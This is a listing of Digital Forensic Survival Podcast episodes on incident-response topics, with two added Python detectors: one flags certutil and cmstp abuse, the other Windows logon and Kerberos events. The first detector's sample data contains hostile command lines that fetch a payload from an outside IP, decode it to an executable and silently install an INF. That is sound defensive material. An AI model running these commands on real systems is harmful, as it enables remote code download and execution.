Digital Forensic Survival Podcast

Listen to talk about computer forensic analysis, techniques, methodology, tool reviews and more.

http://digitalforensicsurvivalpodcast.libsyn.com/podcast

An average episode of this podcast runs 17m. 452 episode(s) have been released so far. A new episode is published every week.

Total length of all episodes: 6 days 5 minutes

DFSP # 407 - More About Lateral Movement and Kerberos


This week it's more about lateral movement and kerberos events.


 December 5, 2023  19m
 
 

DFSP # 406 - All the BIN Directories


In a typical Linux "bin" directory, you can find various types of executable files and scripts that are used to perform different tasks. The confusing part is that there are a number of different BIN directories throughout the file system. What is the...


 November 28, 2023  14m
 
 

DFSP # 405 - Werfault Attacks


Werfault is an interesting artifact in that there is not a lot of documentation on it, yet it may affect an investigation in different ways.  Its appearance in logs sometimes adds a bit of confusion to an investigation because it could mean...


 November 21, 2023  14m
 
 

DFSP # 404 - Certutil Attacks


Certutil, a powerful command-line utility, possesses the potential for misuse by malicious actors to establish illicit network connections. Therefore, it is crucial to familiarize oneself with its legitimate applications and recognize common...


 November 14, 2023  12m
 
 

DFSP # 403 - Lateral Movement Kerberos Auth Events


This week I'm going to cover an important Windows event that provides valuable information about authentication attempts and potential security breaches. The event may be used to identify compromised accounts, identify brute force attacks, or...


 November 7, 2023  15m
 
 

DFSP # 402 - Linux Root Directory Files for DFIR


In Linux and Unix-based operating systems, the "root" account is the superuser or administrator account with the highest level of privileges. It has complete control over the system and can perform any action, including modifying system files,...


 October 31, 2023  18m
 
 

DFSP # 401 - INF Fetch Execute


This week we are taking a bit of a deep dive into an advanced attack technique to accomplish remote execution called “fetch and execute.” While there are different methods to accomplish this sort of thing, what I am going to be focusing on is...


 October 24, 2023  15m
 
 

DFSP # 400 - CMSTP


This week I am going to focus on a specific remote execution technique that you may see in the wild. Remote execution is important for incident response investigations but also for file use and knowledge investigations, particularly those that...


 October 17, 2023  14m
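Episodes 404 (Certutil Attacks) and 400 (CMSTP) both describe a signed Windows binary being repurposed to fetch or execute attacker content. The summaries above do not spell out the command lines, so the following is an added example of my own, not code from the podcast: a small triage script that runs a few command-line rules over constructed process-creation records. The flag combinations it keys on are the documented ones (`certutil -urlcache -split -f <url>` to download a file, `certutil -decode` to turn a base64 blob back into a binary, `cmstp /ni /s <file.inf>` to install an INF silently without a UI); the rule names, thresholds and the sample command lines are assumptions I made for the example.

```python
import re

# Constructed sample process command lines (hypothetical; not real telemetry).
SAMPLE_COMMAND_LINES = [
    r'certutil.exe -urlcache -split -f http://203.0.113.10/payload.txt C:\Users\Public\p.txt',
    r'certutil.exe -decode C:\Users\Public\p.txt C:\Users\Public\p.exe',
    r'certutil.exe -verify -urlfetch C:\certs\server.cer',   # legitimate revocation check
    r'certutil.exe -store My',                                # legitimate store listing
    r'cmstp.exe /ni /s C:\Users\Public\setup.inf',
    r'"C:\Windows\System32\cmstp.exe" /s "C:\Program Files\VPN\corp.inf"',
    r'notepad.exe C:\notes.txt',
]

URL_RE = re.compile(r'^https?://', re.IGNORECASE)
# Directories an unprivileged user can normally write to; an INF dropped here is
# far more suspicious than one shipped under Program Files (assumed list).
USER_WRITABLE_RE = re.compile(
    r'\\(users\\public|temp|appdata|programdata|downloads)\\', re.IGNORECASE)


def tokenize(cmdline):
    """Split on whitespace but keep double-quoted arguments (Windows paths) together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(cmdline):
    """Return the list of rule names that fire for one process command line."""
    tokens = tokenize(cmdline)
    if not tokens:
        return []
    # Executable name only, whether or not a full path and quotes were logged.
    exe = tokens[0].replace('\\', '/').rsplit('/', 1)[-1].lower()
    args = tokens[1:]
    # certutil accepts '-' and cmstp uses '/'; normalise both to bare flag names.
    flags = {t.lstrip('-/').lower() for t in args if t[:1] in ('-', '/')}
    findings = []
    if exe == 'certutil.exe':
        # -urlcache plus an http(s) argument is the "download a file" pattern.
        if 'urlcache' in flags and any(URL_RE.match(t) for t in args):
            findings.append('certutil-download')
        # -decode / -encode are frequently used to unpack a staged payload.
        if flags & {'decode', 'encode'}:
            findings.append('certutil-base64')
    elif exe == 'cmstp.exe':
        # /ni /s: install the INF silently, with no UI (the classic abuse pattern).
        if {'ni', 's'} <= flags:
            findings.append('cmstp-silent-inf')
        if any(t.lower().endswith('.inf') and USER_WRITABLE_RE.search(t) for t in args):
            findings.append('cmstp-inf-user-writable')
    return findings


def scan(cmdlines):
    """Map each command line that fires at least one rule to its findings."""
    return {c: f for c in cmdlines if (f := classify(c))}


if __name__ == '__main__':
    for cmdline, findings in scan(SAMPLE_COMMAND_LINES).items():
        print(', '.join(findings), '<-', cmdline)
```

The two legitimate certutil lines (a revocation check with `-verify -urlfetch` and a store listing) fall through untouched, which is the point the episode summary makes: you need to know the normal usage before the abusive usage stands out. Even the hits are a triage queue rather than a verdict, because administrators do script `certutil -urlcache`; the parent process, the user context and the destination host decide the call.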
 
 

DFSP # 399 - Lateral Movement Failed Logon Events


Finding and analyzing failed logons sometimes is just as important as finding suspicious actual logon activity. Like anything, context is important. Old logon records offer an opportunity to identify not only suspicious activity, but perhaps...


 October 10, 2023  13m
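Episodes 403 (Lateral Movement Kerberos Auth Events) and 399 (Lateral Movement Failed Logon Events) both turn on reading Windows Security events in bulk rather than one at a time. The summaries do not name the event IDs, so the following is an added example of my own, not the podcast's material. It uses three real Security event IDs: 4625 (an account failed to log on, recorded on the target host), 4771 (Kerberos pre-authentication failed, recorded on the domain controller) and 4769 (a Kerberos service ticket was requested, also on the domain controller). The flat record layout, the constructed sample events, the thresholds and the window sizes are assumptions made for the example; the NTSTATUS and Kerberos status codes in the samples are the documented ones (0xC000006D bad username or password, 0xC000006A wrong password, 0x18 KDC_ERR_PREAUTH_FAILED).

```python
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(eid, time, account, src_ip, **extra):
    """Build one flattened event record (my own simplification of the XML fields)."""
    return {"id": eid, "time": time, "account": account, "src_ip": src_ip, **extra}


# Constructed sample events (hypothetical; not from a real log).
SAMPLE_EVENTS = [
    # Five failures in five seconds, each against a different account: a password spray.
    *[_ev(4625, f"2023-10-09T08:00:0{i}", acct, "10.0.0.5", status="0xC000006D")
      for i, acct in enumerate(["alice", "bob", "carol", "dave", "erin"], 1)],
    # Five Kerberos pre-auth failures against one account in 40 seconds: brute force.
    *[_ev(4771, f"2023-10-09T08:10:{i:02d}", "svc_backup", "10.0.0.7", status="0x18")
      for i in range(0, 50, 10)],
    # One stale-password failure from a workstation: ordinary noise.
    _ev(4625, "2023-10-09T09:00:00", "frank", "10.0.0.9", status="0xC000006A"),
    # alice then pulls service tickets for six different hosts in six minutes.
    *[_ev(4769, f"2023-10-09T10:{i:02d}:00", "alice", "10.0.0.5", service=svc)
      for i, svc in enumerate(["WS01$", "WS02$", "WS03$", "FS01$", "SQL01$", "DC01$"])],
    # bob's two tickets are normal workstation use.
    _ev(4769, "2023-10-09T10:00:00", "bob", "10.0.0.6", service="WS07$"),
    _ev(4769, "2023-10-09T10:30:00", "bob", "10.0.0.6", service="FS01$"),
]


def _parsed(events):
    """Attach a datetime to each record and return them in time order."""
    return sorted(({**e, "ts": datetime.fromisoformat(e["time"])} for e in events),
                  key=lambda e: e["ts"])


def failed_auth_bursts(events, min_attempts=5, window=timedelta(minutes=5), spray_accounts=3):
    """Group 4625 and 4771 failures by source IP and flag any source that produces
    min_attempts failures inside a sliding window. Many distinct accounts from one
    source means a spray; one account hammered repeatedly means brute force."""
    by_src = defaultdict(list)
    for e in _parsed(events):
        if e["id"] in (4625, 4771):
            by_src[e["src_ip"]].append(e)
    findings = []
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            hit = evs[start:end + 1]
            if len(hit) >= min_attempts:
                accounts = {e["account"] for e in hit}
                kind = "password-spray" if len(accounts) >= spray_accounts else "brute-force"
                findings.append({"src_ip": src, "attempts": len(hit),
                                 "accounts": len(accounts), "kind": kind})
                break  # one finding per source is enough for triage
    return findings


def service_ticket_fanout(events, min_targets=5, window=timedelta(minutes=10)):
    """Flag accounts whose 4769 requests cover min_targets distinct service hosts
    inside the window: one account touching many hosts quickly is the usual
    lateral-movement shape, whatever tool is driving it."""
    by_acct = defaultdict(list)
    for e in _parsed(events):
        if e["id"] == 4769:
            by_acct[e["account"]].append(e)
    findings = []
    for acct, evs in by_acct.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            targets = {e["service"] for e in evs[start:end + 1]}
            if len(targets) >= min_targets:
                findings.append({"account": acct, "src_ip": evs[end]["src_ip"],
                                 "targets": sorted(targets)})
                break
    return findings


if __name__ == "__main__":
    for f in failed_auth_bursts(SAMPLE_EVENTS) + service_ticket_fanout(SAMPLE_EVENTS):
        print(f)
```

Two details matter when this is run on real exports. The 4769 record is written by the domain controller, so its client address field is the requesting host, not the target; correlating that address with the 4625 source tells you whether the box that failed to authenticate earlier is the same one now collecting tickets. And the thresholds are deliberately low for the constructed data; on a busy domain you would raise them, or better, baseline each account's normal number of distinct target hosts per window and alert on the deviation.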
 
 

DFSP # 398 - OODA & JOHARI


This week I will discuss the use of the OODA loop and JOHARI window in security incident response investigations. These two frameworks are designed to help organizations quickly and effectively respond to security incidents, and can be used in...


 October 3, 2023  16m